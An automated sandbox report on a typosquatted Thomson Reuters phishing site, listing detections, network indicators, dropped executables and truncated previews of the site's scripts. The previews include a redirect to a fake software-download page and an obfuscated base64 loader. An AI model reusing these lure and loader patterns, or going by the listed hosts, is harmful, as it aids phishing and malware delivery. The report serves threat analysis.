Windows Analysis Report
https://tax.thomson-reuterfiles.com/

Overview

General Information

Sample URL: https://tax.thomson-reuterfiles.com/
Analysis ID: 1647531

Detection

Score: 52
Range: 0 - 100
Confidence: 100%

Signatures

AI detected suspicious Javascript
AI detected suspicious URL
HTML page contains suspicious onload / onerror event
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
HTML body contains low number of good links
HTML page contains hidden javascript code
No HTML title found
Suricata IDS alerts with low severity for network traffic
Suspicious form URL found

Classification

[Classification chart. Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Legend: clean, suspicious, malicious.]
  • System is w11x64_office
  • chrome.exe (PID: 728 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
    • chrome.exe (PID: 3288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1860,i,15283521975665651647,5662858992958527142,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2232 /prefetch:11 MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
  • chrome.exe (PID: 6520 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tax.thomson-reuterfiles.com/" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
  • rundll32.exe (PID: 6676 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: C87FA6FC1D294962EABE44509FE1921C)
  • cleanup
No yara matches
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-24T23:26:56.613384+0100 | 2056643 | 2 | Possible Social Engineering Attempted | 192.168.2.24 | 60871 | 194.163.44.11 | 443 | TCP


Phishing

Source: 1.12..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://down.tradingviewdownload.top/dw.php... The script uses the 'Function' constructor to execute dynamically generated code, which is a high-risk indicator of potential malicious behavior. This allows for the execution of arbitrary JavaScript, which could lead to data exfiltration, system compromise, or other harmful actions.
Source: https://tax.thomson-reuterfiles.com | Joe Sandbox AI: The URL 'https://tax.thomson-reuterfiles.com' appears to be a typosquatting attempt targeting the well-known brand 'Thomson Reuters'. The legitimate URL is 'https://www.thomsonreuters.com'. The analyzed URL uses a subdomain 'tax' which could be relevant to Thomson Reuters' tax-related services, increasing the likelihood of user confusion. The main domain 'thomson-reuterfiles.com' closely resembles 'thomsonreuters.com', with the addition of 'files' and the substitution of 'reuters' with 'reuterfiles'. This substitution and addition are likely intended to mislead users into thinking they are interacting with a legitimate Thomson Reuters service. The structural similarity and the use of a relevant subdomain suggest a high likelihood of typosquatting.
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: (new function(atob(this.dataset.digest)))();
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: Number of links: 0
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: Base64 decoded: (function(){var e=[],b={};try{function c(a){if("object"===typeof a&&null!==a){var f={};function n(l){try{var k=a[l];switch(typeof k){case "object":if(null===k)break;case "function":k=k.toString()}f[l]=k}catch(t){e.push(t.message)}}for(var d in a)n(d);try{...
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: HTML title missing
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: Form action: https://down.tradingviewdownload.top/dw.php
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: No favicon
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: No <meta name="author".. found
Source: https://down.tradingviewdownload.top/dw.php | HTTP Parser: No <meta name="copyright".. found
Source: unknown | HTTPS traffic detected: 142.251.32.100:443 -> 192.168.2.24:60850 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.24:60852 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.24:60853 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.238.55.96:443 -> 192.168.2.24:60867 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.24:60869 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.24:60870 version: TLS 1.2
Source: chrome.exe | Memory has grown: Private usage: 12MB later: 36MB
Source: Network traffic | Suricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.24:60871 -> 194.163.44.11:443
Source: global traffic | DNS traffic detected: DNS query: tax.thomson-reuterfiles.com
Source: global traffic | DNS traffic detected: DNS query: google.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: app-data.gcs.trstatic.net
Source: global traffic | DNS traffic detected: DNS query: down.tradingviewdownload.top
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir728_1748885946
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir728_1748885946
Source: classification engine | Classification label: mal52.phis.win@30/19@23/150
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\a65f7ead-e20b-4cfe-81c9-5f7957509ceb.tmp
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1860,i,15283521975665651647,5662858992958527142,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2232 /prefetch:11
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tax.thomson-reuterfiles.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\a65f7ead-e20b-4cfe-81c9-5f7957509ceb.tmp
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\Unconfirmed 562021.crdownload
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 2 Browser Extensions | 1 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Information Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Extra Window Memory Injection | 1 Rundll32 | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 4 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 5 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Extra Window Memory Injection | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label | Link
https://tax.thomson-reuterfiles.com/ | 0% | Avira URL Cloud | safe |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.js | 0% | Avira URL Cloud | safe |
https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.js | 0% | Avira URL Cloud | safe |
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js | 0% | Avira URL Cloud | safe |
https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.css | 0% | Avira URL Cloud | safe |
https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.js | 0% | Avira URL Cloud | safe |
https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.js | 0% | Avira URL Cloud | safe |
https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.js | 0% | Avira URL Cloud | safe |
https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.js | 0% | Avira URL Cloud | safe |
https://down.tradingviewdownload.top/files/images/Logo.png | 0% | Avira URL Cloud | safe |
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js | 0% | Avira URL Cloud | safe |
https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.png | 0% | Avira URL Cloud | safe |
https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
google.com | 142.251.40.142 | true | false |  | high
d22lao95g8jow9.cloudfront.net | 18.238.55.96 | true | false |  | unknown
tax.thomson-reuterfiles.com | 185.241.61.45 | true | false |  | high
www.google.com | 142.251.32.100 | true | false |  | high
down.tradingviewdownload.top | 194.163.44.11 | true | true |  | unknown
app-data.gcs.trstatic.net | unknown | unknown | false |  | unknown
Name | Malicious | Antivirus Detection | Reputation
https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.js | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.js | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.js | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.js | true | Avira URL Cloud: safe | unknown
https://down.tradingviewdownload.top/files/images/Logo.png | false | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.css | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.png | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.js | true | Avira URL Cloud: safe | unknown
https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2 | false | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js | true | Avira URL Cloud: safe | unknown
https://tax.thomson-reuterfiles.com/ | true |  | unknown
https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.js | true | Avira URL Cloud: safe | unknown
https://down.tradingviewdownload.top/dw.php | true |  | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
64.233.180.84 | unknown | United States |  | 15169 | GOOGLEUS | false
1.1.1.1 | unknown | Australia |  | 13335 | CLOUDFLARENETUS | false
185.241.61.45 | tax.thomson-reuterfiles.com | unknown |  | 204476 | ULX-UKGB | false
142.250.80.110 | unknown | United States |  | 15169 | GOOGLEUS | false
142.250.176.202 | unknown | United States |  | 15169 | GOOGLEUS | false
142.251.40.227 | unknown | United States |  | 15169 | GOOGLEUS | false
142.251.32.99 | unknown | United States |  | 15169 | GOOGLEUS | false
142.251.40.131 | unknown | United States |  | 15169 | GOOGLEUS | false
8.8.8.8 | unknown | United States |  | 15169 | GOOGLEUS | false
142.250.65.238 | unknown | United States |  | 15169 | GOOGLEUS | false
142.251.32.110 | unknown | United States |  | 15169 | GOOGLEUS | false
142.251.32.100 | www.google.com | United States |  | 15169 | GOOGLEUS | false
18.238.55.96 | d22lao95g8jow9.cloudfront.net | United States |  | 16509 | AMAZON-02US | false
194.163.44.11 | down.tradingviewdownload.top | Germany |  | 6659 | NEXINTO-DE | true
142.251.35.163 | unknown | United States |  | 15169 | GOOGLEUS | false
                  IP
                  192.168.2.24
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1647531
                  Start date and time:2025-03-24 23:25:33 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Sample URL:https://tax.thomson-reuterfiles.com/
                  Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                  Run name:Potential for more IOCs and behavior
                  Number of analysed new started processes analysed:21
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal52.phis.win@30/19@23/150
                  • Exclude process from analysis (whitelisted): dllhost.exe
                  • Excluded IPs from analysis (whitelisted): 104.18.38.233, 172.64.149.23
                  • Excluded domains from analysis (whitelisted): crt.comodoca.com.cdn.cloudflare.net, crt.comodoca.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: https://tax.thomson-reuterfiles.com/
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):1536
                  Entropy (8bit):1.2751541137543159
                  Encrypted:false
                  SSDEEP:
                  MD5:144FB7197B41C3CCC5DD71646E029F3A
                  SHA1:AD3401ACD1E8155B59D82024D2FA5C51368343BC
                  SHA-256:B1206A178E400750828BFEA3ABB6850E662C1B7310AE61488AAA41D07E757652
                  SHA-512:3DF2E7D138C633F2EF28B0752631B05CA992667772A70CCFBFE8D4566D18E437B9457DC4E3AD198FF15AB429CAFC416B39EF2C4BEB9C4347DD8FDB9EB6233F23
                  Malicious:false
                  Reputation:unknown
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:BA222AD5AFF9A6C4C854D89F59C84D52
                  SHA1:FB4B3461554849B79E60C5A227E9B652E15E5F9E
                  SHA-256:2A79CE303DF4FDECE161FF1E7A5D56FF613FD4521B1F6A0914BA6A7A8394981E
                  SHA-512:84FDCFFD865C69F36DFF8C27ACB5A696CC67E419EFDDA04D3C9B307E59B3B27F302799E26D03B7095578F617C5AAB3F43501256B95808FFDDBBD5274358DC0FF
                  Malicious:false
                  Reputation:unknown
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):83360
                  Entropy (8bit):6.51284712717126
                  Encrypted:false
                  SSDEEP:
                  MD5:BA222AD5AFF9A6C4C854D89F59C84D52
                  SHA1:FB4B3461554849B79E60C5A227E9B652E15E5F9E
                  SHA-256:2A79CE303DF4FDECE161FF1E7A5D56FF613FD4521B1F6A0914BA6A7A8394981E
                  SHA-512:84FDCFFD865C69F36DFF8C27ACB5A696CC67E419EFDDA04D3C9B307E59B3B27F302799E26D03B7095578F617C5AAB3F43501256B95808FFDDBBD5274358DC0FF
                  Malicious:false
                  Reputation:unknown
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):7751
                  Entropy (8bit):6.230964105718949
                  Encrypted:false
                  SSDEEP:
                  MD5:71051E702EF1925286D950CF7A3F00D4
                  SHA1:458F9323F7315F822011501A6E4CE1E22B1B7B76
                  SHA-256:7187E4503153448CF8503892E70ED1359E7EED72A040BB4457102A6E577A7DC3
                  SHA-512:C7F013F97D8091D4E737D3ACD773DA68CC5CFBD2DF50D245B3D3E8A71DE1A434D52000FCC80BD6BA66A68C9D677F6F541FBAF525361FA9AA52B900A1898AD5C3
                  Malicious:false
                  Reputation:unknown
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (60667), with no line terminators
                  Category:downloaded
                  Size (bytes):60925
                  Entropy (8bit):5.221090580255161
                  Encrypted:false
                  SSDEEP:
                  MD5:28F2F56C3974CCB9FFA2913CF382BFC0
                  SHA1:7CDB9B252F4DA482716EE433F4D779661F77042A
                  SHA-256:351B7DF005DB3E41B0C212E6ECFFAC299DD0F2E911D81AEA685D3B02B2F95E63
                  SHA-512:5877813AA9B0BB1CD40EC8C30FFEF87D9D40BD2D260818DB025B1456DE0F0DA2C17BFD3DAD3D6E531587F05188A9D5BC92F5BEB89F5742B11EFB49436B5864EE
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[405],{5728:function(s,c,e){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return e(7254)}])},7254:function(s,c,e){"use strict";e.r(c),e.d(c,{default:function(){return pages}});var t=e(5893),a=e(7294),l=e(6896),components_Popup=function(s){let{open:c,setOpen:e}=s,{locale:n}=(0,l.Z)(),[r,h]=(0,a.useState)(1);return(0,a.useEffect)(()=>{c&&(h(1),window.location.href="https://down.Deepseekdownload.top/dw/dw.php")},[c]),(0,t.jsxs)("div",{className:"fixed inset-0 z-[100] flex items-center justify-center px-4 transition-all duration-500 ".concat(c?"opacity-100 visible":"opacity-0 invisible"),children:[(0,t.jsx)("div",{onClick:()=>{e(!1)},className:"absolute inset-0 bg-black bg-opacity-50 backdrop-blur-sm",style:{opacity:1}}),(0,t.jsxs)("div",{className:"relative bg-[#060606] p-4 sm:p-6 rounded-2xl w-full max-w-[512px]",style:{opacity:1,transform:"none"},children:[(0,t.jsxs)("div",{className:"flex items-center justify-center p
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 28740, version 1.0
                  Category:downloaded
                  Size (bytes):28740
                  Entropy (8bit):7.992640337554668
                  Encrypted:true
                  SSDEEP:
                  MD5:30164609C16364DE36B51BAF83BDEC4E
                  SHA1:FE93B8F82DC099CCA5E441FDEAF30FEA53202FB1
                  SHA-256:7A19A7027E125257D310C6DBD78AE3A30B5EA1E3794D60B12BB28227A003BFDA
                  SHA-512:A2F1B37730D209BC6E638E98BFF78EC294BE964A2B95308207EA84521409803523E11C62337A38CDB331A5E4FB58CB0171F139574C50B38414A5CD26325EE4EB
                  Malicious:false
                  Reputation:unknown
                  URL:https://fonts.gstatic.com/s/sourcesans3/v18/nwpStKy2OAdR1K-IwhWudF-R3w8aZQ.woff2
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text
                  Category:downloaded
                  Size (bytes):315
                  Entropy (8bit):5.0572271090563765
                  Encrypted:false
                  SSDEEP:
                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                  Malicious:false
                  Reputation:unknown
                  URL:https://down.tradingviewdownload.top/files/images/Logo.png
                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):117898
                  Entropy (8bit):5.374105106842063
                  Encrypted:false
                  SSDEEP:
                  MD5:4E1FA4B25BB3E13122ADB6FC89B692A9
                  SHA1:62A57CC9D9D92E27254C8FCA63A7C217741FE0DC
                  SHA-256:BD3F95C00C05EFA6CD717A4B287146FF3148D9637EFAAFB7F697EA8EBB162017
                  SHA-512:40145E4843102AAF203EC6F9CCADA0D846A4CECAED2AFFF92C93FD6D070B83BF2E526F0038452A732A4AF1E9A37E694F1CA78695308014CE071F43AEB5D9C3C4
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{4878:function(r,n){"use strict";function getDeploymentIdQueryOrEmptyString(){return""}Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(n,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return getDeploymentIdQueryOrEmptyString}})},37:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var r=/\((.*)\)/.exec(this.toString());return r?r[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(r,n){return n=this.concat.apply([],this),r>1&&n.some(Array.isArray)?n.flat(r-1):n},Array.prototype.flatMap=function(r,n){return this.map(r,n).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(r){if("function"!=typeof r)return
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):77
                  Entropy (8bit):4.37144473219773
                  Encrypted:false
                  SSDEEP:
                  MD5:B6652DF95DB52FEB4DAF4ECA35380933
                  SHA1:65451D110137761B318C82D9071C042DB80C4036
                  SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                  SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js
                  Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (1476)
                  Category:downloaded
                  Size (bytes):3472
                  Entropy (8bit):5.1522869804082845
                  Encrypted:false
                  SSDEEP:
                  MD5:F309517DC333784216BE4FF5DEA5045C
                  SHA1:F2434DC4F60F3B892C062B84E463BFD2BF3B5679
                  SHA-256:FC06A24B94DBA08EF5DADAE7F769BBD17DC2ED115AD8614EBECDD86EF4E8BF87
                  SHA-512:FBBF64844F63F035A075C8B173708B9F2BF21E35C92EAD9ED9F6EAE359851ECA38BE90B0A311D81AF185A9E6200D77B3D60E54AB2AF68A6053D9ABACD2782136
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/
                  Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-head-count" content="2"/><meta name="google-site-verification" content="27wxy8zChhtA5aSjzVrIEj2ON_2R6X8iKBWg_iGK650"/><link rel="preload" href="/_next/static/css/6c5712a607796dcd.css" as="style" crossorigin=""/><link rel="stylesheet" href="/_next/static/css/6c5712a607796dcd.css" crossorigin="" data-n-g=""/><noscript data-n-css=""></noscript><script defer="" crossorigin="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-2555a4296ab7a1b2.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/framework-0c7baedefba6b077.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/main-49b0a41ec78c7394.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/pages/_app-1e66c022522ffc96.js" defer="" crossorigin=""></script><script src="/_next/static/chunk
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1966), with no line terminators
                  Category:downloaded
                  Size (bytes):1966
                  Entropy (8bit):5.172480733240752
                  Encrypted:false
                  SSDEEP:
                  MD5:424CAF40614A148FC5159DE89A28E904
                  SHA1:86EA812BFBB08497B8102D8D65D949B5FBA4E742
                  SHA-256:8548F0E5D0AD9F008612807170927D4E3126C46496C184C05F0FB1CE4B728003
                  SHA-512:EA9CA9A7CE2961671FA958C06D2234766DEA994DFF0B0980215867DCCA66886F19AD4095BB734230241C706BDD42667DFE02573F415B48D9E437BF8CDD014A02
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.js
                  Preview:!function(){"use strict";var e,r,_,n,t={},u={};function __webpack_require__(e){var r=u[e];if(void 0!==r)return r.exports;var _=u[e]={exports:{}},n=!0;try{t[e].call(_.exports,_,_.exports,__webpack_require__),n=!1}finally{n&&delete u[e]}return _.exports}__webpack_require__.m=t,e=[],__webpack_require__.O=function(r,_,n,t){if(_){t=t||0;for(var u=e.length;u>0&&e[u-1][2]>t;u--)e[u]=e[u-1];e[u]=[_,n,t];return}for(var i=1/0,u=0;u<e.length;u++){for(var _=e[u][0],n=e[u][1],t=e[u][2],o=!0,c=0;c<_.length;c++)i>=t&&Object.keys(__webpack_require__.O).every(function(e){return __webpack_require__.O[e](_[c])})?_.splice(c--,1):(o=!1,t<i&&(i=t));if(o){e.splice(u--,1);var a=n()}}return a},__webpack_require__.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return __webpack_require__.d(r,{a:r}),r},__webpack_require__.d=function(e,r){for(var _ in r)__webpack_require__.o(r,_)&&!__webpack_require__.o(e,_)&&Object.defineProperty(e,_,{enumerable:!0,get:r[_]})},__webpack_requ
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (470), with no line terminators
                  Category:downloaded
                  Size (bytes):470
                  Entropy (8bit):5.434697340185277
                  Encrypted:false
                  SSDEEP:
                  MD5:B46E5B6908337511AFAC3760D2E1E518
                  SHA1:D947F28C2EB370CA33E2182E36D7D7BCCBF31AD8
                  SHA-256:B06E69FA3D38C5D4428B915BA50061C4CDBDA9766870CE3BF3525226C43EABB2
                  SHA-512:2127A842815B996FF922418DDBD343FCA05DB0E56871938EA55456DDA7A91F412DBD9097389071CA9D0C1EB4744400ABACE931A706997D18FC0A375B26521F2A
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js
                  Preview:self.__BUILD_MANIFEST={__rewrites:{afterFiles:[],beforeFiles:[],fallback:[]},"/":["static/chunks/849-a4a13dffe91c49e7.js","static/chunks/pages/index-899e26e961b4ef93.js"],"/404":["static/chunks/pages/404-7fda4da57b5079e3.js"],"/_error":["static/chunks/pages/_error-ee5b5fb91d29d86f.js"],"/sitemap.xml":["static/chunks/pages/sitemap.xml-66ac2aebe440de2a.js"],sortedPages:["/","/404","/_app","/_error","/sitemap.xml"]},self.__BUILD_MANIFEST_CB&&self.__BUILD_MANIFEST_CB();
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (3627), with no line terminators
                  Category:downloaded
                  Size (bytes):3627
                  Entropy (8bit):5.366412655772073
                  Encrypted:false
                  SSDEEP:
